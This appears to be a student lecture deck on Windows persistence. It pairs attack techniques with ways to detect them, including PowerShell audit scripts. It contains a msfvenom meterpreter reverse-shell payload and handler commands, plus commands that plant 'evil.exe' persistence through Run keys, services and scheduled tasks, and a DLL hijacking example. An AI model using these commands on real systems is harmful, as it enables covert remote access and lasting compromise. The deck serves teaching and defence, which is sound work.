Gaining and detecting
Windows Persistence
Prepared by:
Levytskyi Oleg
Student ZI-41
Security Analyst
WARNING
The materials of the lecture are presented only for
EDUCATIONAL PURPOSES.
The speaker is not responsible for the use of this
information for illegal purposes
Creating payload
root@kali:~# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe -o evill.exe
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.2 //(your ip)
msf > set LPORT 4444 //(your port)
msf > exploit
Typical attack. V1 (slide storyboard)
run exploit -> cmd shell>_
"Hm. smth go wrong. I want to reboot system."
Connection Lost -> Destination host unreachable
Attack. V2 (slide storyboard)
run exploit -> cmd shell>_
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"Hm. smth go wrong. I want to reboot system."
Connection Lost -> System is starting -> cmd shell>_
So, what is persistence?
What kind of persistence do you know?
Is it really a huge problem?
Persistence causes programs to run each time that a user logs on or the system starts, usually in the background.
"Hackers use persistence, not zero days to breach companies"
Registry autoruns
Run/RunOnce Keys
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
● HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies
Keys used by WinLogon Process
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Startup Keys
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User
…
Create autorun
cmd> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /V "My" /t REG_SZ /D "C:\...\evil.exe"
OR
PS> Set-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "My" -Value "C:\...\evil.exe"
… and reboot;)
But sometimes life becomes harder
And when the best one gives up
For the help comes...
Autorun. How to detect?
Link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login.
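When Autoruns is not at hand, the Run/RunOnce keys and the Winlogon Shell value listed above can be reviewed from PowerShell. This is an added example, not part of the slides; the set of "trusted" base directories is an assumption to tune per environment.

```powershell
# Added example (not from the slides): enumerate the autorun keys the deck lists
# and flag entries whose executable lives outside the usual trusted directories.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Assumption: autostart entries are normally expected only under these roots
$trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

function Get-AutorunEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, ...
            $value = [string]$p.Value
            # Take the executable part: a quoted path, or the first token of the command line
            $exe = if ($value -match '^"([^"]+)"') { $Matches[1] } else { ($value -split ' ')[0] }
            $hit = $trusted | Where-Object { $exe.StartsWith($_, 'OrdinalIgnoreCase') }
            [pscustomobject]@{
                Key        = $key
                Name       = $p.Name
                Command    = $value
                Suspicious = (-not $hit)
            }
        }
    }
}

# The Winlogon Shell value should only ever name explorer.exe
$winlogon = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
if ($winlogon.Shell -ne 'explorer.exe') { "Winlogon Shell has been changed: $($winlogon.Shell)" }

Get-AutorunEntries | Where-Object Suspicious | Format-Table -AutoSize
```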
Services
Create new service
cmd> sc create My binPath= "C:\...\evil.exe" type= own start= auto
OR
PS> New-Service -Name "My" -BinaryPathName "C:\...\evil.exe" -DisplayName "My" -StartupType Automatic
Change service path
Registry Path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Services. How to look at them?
PowerShell commands:
PS> Get-Service
PS> Get-WmiObject Win32_Service
Services. Real-world situation
Unquoted service path
C:\PROGRAM FILES\SUB DIR\PROGRAM NAME
C:\PROGRAM*FILES\SUB*DIR\PROGRAM*NAME  (* marks each space)
● c:\program.exe files\sub dir\program name
● c:\program files\sub.exe dir\program name
● c:\program files\sub dir\program.exe name
Unquoted service path. How to detect?
cmd> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Unquoted service path. How to resolve?
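The wmic one-liner above can be expressed in PowerShell with the same filters, and the finding is resolved by quoting the executable in the service's ImagePath under the Services key named earlier. This is an added example, not from the slides; it assumes the service binary ends in .exe and that the repair is run with administrative rights.

```powershell
# Added example (not from the slides): detect auto-start services whose executable path
# contains a space but is not quoted, then quote the path in the Services registry key.
function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service |
        Where-Object {
            $_.StartMode -eq 'Auto' -and
            $_.PathName -and
            -not $_.PathName.StartsWith('"') -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
            # Only the executable part (up to the first .exe) matters; arguments may contain spaces.
            # Assumption: the binary is an .exe; other extensions fall through to the whole string.
            ($_.PathName -replace '\.exe.*$', '.exe') -match ' '
        } |
        Select-Object Name, DisplayName, PathName, StartMode
}

function Repair-UnquotedServicePath {
    param([Parameter(Mandatory)][string]$Name)
    $key   = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $image = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    if ($image.StartsWith('"')) { return "$Name is already quoted" }
    # Split executable from arguments at the first .exe boundary and quote only the executable
    if ($image -match '^(?<exe>.*?\.exe)(?<args>.*)$') {
        $fixed = '"' + $Matches.exe + '"' + $Matches.args
        Set-ItemProperty -Path $key -Name ImagePath -Value $fixed   # requires admin rights
        return "$Name -> $fixed"
    }
    return "$Name`: no .exe found in '$image', fix by hand"
}

Get-UnquotedServicePath | Format-Table -AutoSize
# Repair-UnquotedServicePath -Name 'My'   # run per finding after confirming the intended binary
```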
Schedule tasks V1 (at). How?
cmd> at 08:00 /EVERY:m,t,w,th,f,s,su "C:\...\evil.exe"
(ALWAYS SYSTEM priv)
C:\Windows\system32> at /?
The AT command schedules commands and programs to run on a computer at
a specified time and date. The Schedule service must be running to use
the AT command.
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
    [ /EVERY:date[,...] | /NEXT:date[,...]] "command"
Schedule tasks V2
cmd> SchTasks /Create /SC DAILY /TN "My" /TR "C:\...\evil.exe" /ST 17:00
Schedule tasks. How to detect?
cmd> schtasks /query /FO CSV /v > schtasks.csv
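The CSV exported above is easier to triage once parsed: tasks created with at or schtasks as shown earlier run a binary outside the Windows and Program Files trees, often as SYSTEM. This is an added example, not from the slides; it assumes the English column names that schtasks /v emits and that the trusted roots are the system and Program Files directories.

```powershell
# Added example (not from the slides): parse schtasks.csv (from "schtasks /query /FO CSV /v")
# and surface tasks whose command lives outside the trusted roots, SYSTEM-run ones first.
function Get-SuspiciousTasks {
    param([string]$Csv = '.\schtasks.csv')
    # Assumption: trusted roots; a task binary elsewhere deserves a look
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

    Import-Csv -Path $Csv |
        Where-Object { $_.TaskName -ne 'TaskName' } |                        # /v repeats the header row per folder
        Where-Object { $_.'Task To Run' -and $_.'Task To Run' -ne 'N/A' } |  # skip folders / disabled stubs
        ForEach-Object {
            $cmd = $_.'Task To Run'
            # Executable part: a quoted path, or the first token of the command line
            $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] } else { ($cmd -split ' ')[0] }
            $hit = $trusted | Where-Object { $exe.StartsWith($_, 'OrdinalIgnoreCase') }
            [pscustomobject]@{
                TaskName = $_.TaskName
                RunAs    = $_.'Run As User'
                Schedule = $_.'Schedule Type'
                Command  = $cmd
                Flag     = (-not $hit)
            }
        } |
        Where-Object Flag |
        Sort-Object { $_.RunAs -eq 'SYSTEM' } -Descending
}

Get-SuspiciousTasks | Format-Table -AutoSize
```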
DLL hijacking and PATH magic
Dynamic-link library (or DLL) is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating systems.
With both implicit and explicit linking, Windows first searches for "known DLLs", such as Kernel32.dll and User32.dll. Windows then searches for the DLLs in the following sequence:
1. The directory where the executable module for the current process is located.
2. The current directory.
3. The Windows system directory. The GetSystemDirectory function retrieves the path of this directory.
4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory.
5. The directories listed in the PATH environment variable.
...Do you know your PATH?
DLL hijacking and PATH magic
PS C:\Users\leo\Desktop> echo $env:PATH
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0;C:\Program Files\OpenVPN\bin; C:\Python27
PS C:\Users\leo\Desktop> (Get-ACL C:\Python27).Access
NT AUTHORITY\Authenticated Users FullAccess
PS C:\Users\leo\Desktop> cp wlbsctrl.dll C:\Python27
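The condition exploited above is a PATH directory writable by a broad principal; the check below walks every PATH entry and reports such ACEs, and also reports PATH entries that do not exist (a directory that anyone could create). This is an added example, not from the slides; the list of "broad" principals is an assumption.

```powershell
# Added example (not from the slides): find PATH directories that broad principals can write to,
# the situation that allowed wlbsctrl.dll to be dropped into C:\Python27 in the session above.
# Note: with SafeDllSearchMode (the default on modern Windows) the current directory is searched
# after the system directories, but PATH is still searched last, so a writable PATH entry is reached
# for any DLL that is not found earlier in the order.
# Assumption: these principals count as "broad"
$broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-WritablePathDirs {
    $dirs = $env:PATH -split ';' | ForEach-Object { $_.Trim() } | Where-Object { $_ }
    foreach ($dir in $dirs) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
            # A missing entry is reported too: whoever can create it owns that search-path slot
            [pscustomobject]@{ Directory = $dir; Principal = '(none)'; Rights = 'directory does not exist' }
            continue
        }
        $acl = Get-Acl -LiteralPath $dir
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($broad -notcontains $ace.IdentityReference.Value) { continue }
            # Any of these rights lets the principal place or replace a file in the directory
            if ($ace.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles') {
                [pscustomobject]@{
                    Directory = $dir
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

Get-WritablePathDirs | Format-Table -AutoSize
```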
Shortcut hijacking
Check in form
Link: https://goo.gl/forms/HxB915h8NDm83VGj1
Thank you for listening!